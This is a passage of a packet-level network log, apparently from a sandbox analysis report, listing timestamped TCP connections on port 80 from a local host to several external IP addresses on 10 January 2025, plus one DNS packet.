                                                                              Jan 10, 2025 18:54:22.203289986 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203327894 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203375101 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203387022 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203397036 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203411102 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203428030 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203464985 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203466892 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203480005 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203512907 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203676939 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203692913 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203705072 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203716993 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203727961 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203742027 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203743935 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203743935 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203757048 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203767061 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203799963 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203820944 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203833103 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203844070 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203866005 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.203870058 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.203908920 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.208489895 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208527088 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208538055 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208551884 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208559036 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208580017 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208591938 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208602905 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208642006 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.208669901 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.208717108 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208781004 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208794117 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208825111 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.208856106 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208868027 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208878994 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208900928 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.208926916 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208930969 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.208940029 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208970070 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208980083 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.208985090 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.208992958 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.209027052 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.209110022 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.209120989 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.209131002 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.209157944 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.209183931 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.209237099 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:22.209285021 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.213021994 CET4971480192.168.2.8104.21.28.65
                                                                              Jan 10, 2025 18:54:22.217835903 CET8049714104.21.28.65192.168.2.8
                                                                              Jan 10, 2025 18:54:27.356775045 CET4971580192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:27.361624002 CET8049715172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:54:27.361749887 CET4971580192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:27.376734972 CET4971580192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:27.381850958 CET8049715172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:54:28.889425039 CET4971580192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:28.894578934 CET8049715172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:54:28.894628048 CET4971580192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:29.908114910 CET4971880192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:29.913146019 CET8049718172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:54:29.916280985 CET4971880192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:29.929508924 CET4971880192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:29.934407949 CET8049718172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:54:31.436376095 CET4971880192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:31.469341040 CET8049718172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:54:31.469489098 CET4971880192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:32.454452991 CET4971980192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:32.459624052 CET8049719172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:54:32.459737062 CET4971980192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:32.479824066 CET4971980192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:32.484630108 CET8049719172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:54:32.484703064 CET8049719172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:54:33.983258009 CET4971980192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:33.988682985 CET8049719172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:54:33.988765001 CET4971980192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:35.002357960 CET4972080192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:35.007978916 CET8049720172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:54:35.008135080 CET4972080192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:35.017736912 CET4972080192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:54:35.022584915 CET8049720172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:55:14.926848888 CET8049720172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:55:14.926924944 CET8049720172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:55:14.931248903 CET4972080192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:55:14.962116003 CET4972080192.168.2.8172.67.138.138
                                                                              Jan 10, 2025 18:55:14.967191935 CET8049720172.67.138.138192.168.2.8
                                                                              Jan 10, 2025 18:55:20.184079885 CET4972180192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:20.188939095 CET804972169.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:20.189013004 CET4972180192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:20.207743883 CET4972180192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:20.212824106 CET804972169.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:20.841234922 CET804972169.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:20.841645002 CET804972169.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:20.841778994 CET4972180192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:21.717771053 CET4972180192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:22.736816883 CET4972280192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:22.741835117 CET804972269.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:22.741956949 CET4972280192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:22.757997036 CET4972280192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:22.762957096 CET804972269.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:23.387659073 CET804972269.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:23.387815952 CET804972269.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:23.389513016 CET4972280192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:24.264576912 CET4972280192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:25.284301996 CET4972380192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:25.289364100 CET804972369.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:25.292427063 CET4972380192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:25.308222055 CET4972380192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:25.313086033 CET804972369.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:25.313235998 CET804972369.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:25.919161081 CET804972369.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:25.919243097 CET804972369.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:25.919332027 CET4972380192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:26.811470985 CET4972380192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:27.831626892 CET4972480192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:27.836416960 CET804972469.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:27.836489916 CET4972480192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:27.850214958 CET4972480192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:27.855014086 CET804972469.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:28.457796097 CET804972469.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:28.458282948 CET804972469.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:28.458327055 CET4972480192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:28.461482048 CET4972480192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:28.466218948 CET804972469.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:34.235105038 CET4972580192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:34.239931107 CET8049725101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:34.240020990 CET4972580192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:34.255475044 CET4972580192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:34.260397911 CET8049725101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:35.243802071 CET8049725101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:35.244112968 CET8049725101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:35.244239092 CET4972580192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:35.764703989 CET4972580192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:36.786802053 CET4972680192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:36.791682005 CET8049726101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:36.791965008 CET4972680192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:36.808756113 CET4972680192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:36.813513994 CET8049726101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:37.683824062 CET8049726101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:37.683862925 CET8049726101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:37.684101105 CET4972680192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:38.311661959 CET4972680192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:39.330967903 CET4972780192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:39.336123943 CET8049727101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:39.336231947 CET4972780192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:39.352354050 CET4972780192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:39.357239008 CET8049727101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:39.357451916 CET8049727101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:40.303808928 CET8049727101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:40.303828001 CET8049727101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:40.303894997 CET4972780192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:40.858488083 CET4972780192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:41.891704082 CET4972880192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:41.896583080 CET8049728101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:41.896651030 CET4972880192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:41.909040928 CET4972880192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:41.913975000 CET8049728101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:42.895385027 CET8049728101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:42.895437956 CET8049728101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:42.895648003 CET4972880192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:42.898171902 CET4972880192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:42.903019905 CET8049728101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:48.573584080 CET4972980192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:48.578474045 CET8049729103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:48.578589916 CET4972980192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:48.595082045 CET4972980192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:48.599909067 CET8049729103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:50.108422041 CET4972980192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:50.113810062 CET8049729103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:50.113884926 CET4972980192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:51.127633095 CET4973080192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:51.132497072 CET8049730103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:51.135379076 CET4973080192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:51.151169062 CET4973080192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:51.155999899 CET8049730103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:52.655339956 CET4973080192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:52.664184093 CET8049730103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:52.664258003 CET4973080192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:53.676345110 CET4973180192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:53.681211948 CET8049731103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:53.681329966 CET4973180192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:53.696706057 CET4973180192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:53.701756001 CET8049731103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:53.701788902 CET8049731103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:55.202255011 CET4973180192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:55.207276106 CET8049731103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:55.208488941 CET4973180192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:56.221628904 CET4973280192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:56.226439953 CET8049732103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:56.226536989 CET4973280192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:56.237102032 CET4973280192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:56.241911888 CET8049732103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:57.938616037 CET8049732103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:57.938640118 CET8049732103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:55:57.938769102 CET4973280192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:57.942482948 CET4973280192.168.2.8103.159.36.66
                                                                              Jan 10, 2025 18:55:57.947309017 CET8049732103.159.36.66192.168.2.8
                                                                              Jan 10, 2025 18:56:03.154047012 CET4973380192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:03.158894062 CET8049733103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:03.158981085 CET4973380192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:03.175050974 CET4973380192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:03.179868937 CET8049733103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:03.712727070 CET8049733103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:03.712790966 CET8049733103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:03.712869883 CET4973380192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:04.686598063 CET4973380192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:05.709470034 CET4973480192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:05.714365959 CET8049734103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:05.714749098 CET4973480192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:05.732431889 CET4973480192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:05.737236977 CET8049734103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:07.234546900 CET4973480192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:07.239660025 CET8049734103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:07.239959955 CET4973480192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:08.253530025 CET4973580192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:08.258414030 CET8049735103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:08.258512974 CET4973580192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:08.277815104 CET4973580192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:08.282638073 CET8049735103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:08.282871962 CET8049735103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:08.844739914 CET8049735103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:08.844968081 CET8049735103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:08.851279974 CET4973580192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:09.782368898 CET4973580192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:10.799145937 CET4973680192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:10.804059982 CET8049736103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:10.804495096 CET4973680192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:10.814485073 CET4973680192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:10.819355011 CET8049736103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:11.365905046 CET8049736103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:11.366074085 CET8049736103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:11.366652966 CET4973680192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:11.369251013 CET4973680192.168.2.8103.168.172.37
                                                                              Jan 10, 2025 18:56:11.374041080 CET8049736103.168.172.37192.168.2.8
                                                                              Jan 10, 2025 18:56:16.397469044 CET4973780192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:16.402601957 CET8049737188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:56:16.402679920 CET4973780192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:16.420114040 CET4973780192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:16.425102949 CET8049737188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:56:17.936703920 CET4973780192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:17.941914082 CET8049737188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:56:17.941967964 CET4973780192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:18.955493927 CET4973880192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:18.960273027 CET8049738188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:56:18.960395098 CET4973880192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:18.977051973 CET4973880192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:18.981806040 CET8049738188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:56:20.484198093 CET4973880192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:20.489458084 CET8049738188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:56:20.492341042 CET4973880192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:21.502684116 CET4973980192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:21.507596016 CET8049739188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:56:21.508452892 CET4973980192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:21.525867939 CET4973980192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:21.530723095 CET8049739188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:56:21.530814886 CET8049739188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:56:23.030524015 CET4973980192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:23.035712957 CET8049739188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:56:23.035768032 CET4973980192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:24.049761057 CET4974080192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:24.054532051 CET8049740188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:56:24.054848909 CET4974080192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:24.064799070 CET4974080192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:56:24.069655895 CET8049740188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:57:03.410238981 CET8049740188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:57:03.410600901 CET8049740188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:57:03.410897017 CET4974080192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:57:03.415513992 CET4974080192.168.2.8188.114.96.3
                                                                              Jan 10, 2025 18:57:03.420336008 CET8049740188.114.96.3192.168.2.8
                                                                              Jan 10, 2025 18:57:08.480748892 CET4974180192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:08.485635042 CET804974184.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:08.485934019 CET4974180192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:08.498878002 CET4974180192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:08.503789902 CET804974184.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:09.178152084 CET804974184.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:09.179373980 CET4974180192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:10.014771938 CET4974180192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:10.019622087 CET804974184.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:11.033788919 CET4974280192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:11.038947105 CET804974284.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:11.039028883 CET4974280192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:11.056468010 CET4974280192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:11.061467886 CET804974284.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:11.524404049 CET804974284.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:11.524564981 CET4974280192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:12.561660051 CET4974280192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:12.566585064 CET804974284.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:13.580758095 CET4974380192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:13.585993052 CET804974384.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:13.586091042 CET4974380192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:13.601264000 CET4974380192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:13.606426954 CET804974384.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:13.606502056 CET804974384.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:14.240256071 CET804974384.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:14.240369081 CET4974380192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:15.108683109 CET4974380192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:15.114031076 CET804974384.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.128055096 CET4974480192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:16.132913113 CET804974484.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.132988930 CET4974480192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:16.146020889 CET4974480192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:16.150842905 CET804974484.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.592042923 CET804974484.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.592070103 CET804974484.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.592082977 CET804974484.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.592187881 CET804974484.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.592200041 CET804974484.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.592221975 CET804974484.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.592223883 CET4974480192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:16.592235088 CET804974484.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.592251062 CET804974484.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.592262030 CET804974484.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.592262030 CET4974480192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:16.592278004 CET804974484.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.592284918 CET4974480192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:16.592295885 CET804974484.32.84.32192.168.2.8
                                                                              Jan 10, 2025 18:57:16.592304945 CET4974480192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:16.592324018 CET4974480192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:16.592358112 CET4974480192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:16.597779989 CET4974480192.168.2.884.32.84.32
                                                                              Jan 10, 2025 18:57:16.602621078 CET804974484.32.84.32192.168.2.8

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 10, 2025 18:53:53.803040981 CET5225653192.168.2.81.1.1.1
